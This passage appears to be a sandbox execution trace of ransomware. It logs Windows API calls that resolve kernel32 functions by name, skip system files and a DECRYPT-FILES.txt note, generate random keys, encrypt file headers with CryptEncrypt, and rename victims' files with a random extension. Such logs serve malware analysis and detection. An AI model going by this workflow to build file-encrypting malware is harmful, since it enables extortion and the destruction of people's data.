lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.024] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.024] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.024] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.024] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.024] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.025] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.025] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.025] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.025] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.025] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.025] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.025] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.025] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.025] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.025] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.025] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.025] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.025] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.025] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.025] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.025] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.025] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.025] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.025] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.026] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.026] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf") returned 65 [0077.026] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf.AQz6V3") returned 72 [0077.026] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cxtbkjur4xy5m c.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CXtBKJuR4xY5m c.swf.AQz6V3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cxtbkjur4xy5m c.swf.aqz6v3"), dwFlags=0x0) returned 1 [0077.026] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.027] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.027] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.027] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc44fe630, ftCreationTime.dwHighDateTime=0x1d4c787, ftLastAccessTime.dwLowDateTime=0xac6a6050, ftLastAccessTime.dwHighDateTime=0x1d4d00a, ftLastWriteTime.dwLowDateTime=0xac6a6050, ftLastWriteTime.dwHighDateTime=0x1d4d00a, nFileSizeHigh=0x0, nFileSizeLow=0x4794, dwReserved0=0x0, dwReserved1=0x0, cFileName="D2zhG8jS.swf", cAlternateFileName="")) returned 1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="DECRYPT-FILES.txt") returned -1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="autorun.inf") returned 1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="boot.ini") returned 1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="desktop.ini") returned -1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="ntuser.dat") returned -1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="iconcache.db") returned -1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="bootsect.bak") returned 1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="ntuser.dat.log") returned -1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="thumbs.db") returned -1 [0077.027] lstrcmpiW (lpString1="D2zhG8jS.swf", lpString2="Bootfont.bin") returned 1 [0077.027] lstrlenW (lpString="D2zhG8jS.swf") returned 12 [0077.027] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0077.027] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0077.027] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0077.027] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0077.028] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.028] lstrlenW (lpString="D2zhG8jS.swf") returned 12 [0077.028] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.028] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="D2zhG8jS.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf" [0077.028] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\D2zhG8jS.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\d2zhg8js.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.028] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=18324) returned 1 [0077.028] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.028] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.028] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.028] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.028] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.029] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.029] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.029] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.030] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.030] CloseHandle (hObject=0x444) returned 1 [0077.030] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.030] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.031] CloseHandle (hObject=0x0) returned 0 [0077.031] CloseHandle (hObject=0x440) returned 1 [0077.032] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.032] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.032] GetTickCount () returned 0x114bc4e [0077.032] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.033] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.033] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.033] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.033] lstrlenA (lpString="kernel32.dll") returned 12 [0077.033] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.033] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.033] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.033] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.034] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.034] lstrlenA (lpString="ADDATOMA") returned 8 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.034] lstrlenA (lpString="ADDATOMW") returned 8 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.034] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.034] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.034] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.034] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.034] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.034] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.034] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.034] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.034] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.034] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.034] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.034] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.034] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.034] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.034] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.034] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.034] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.035] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.035] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.035] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.035] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.035] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.035] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.035] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.035] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.035] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.035] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.035] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.035] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.035] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.035] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.035] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.035] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.035] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.035] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.035] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.036] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.036] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.036] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.036] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.036] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.036] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.036] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.036] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.036] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.036] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.036] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.036] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.036] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.036] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.036] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.036] lstrlenA (lpString="BEEP") returned 4 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.036] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.036] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.036] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.037] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.037] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.037] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.037] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.037] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.037] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.037] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.037] 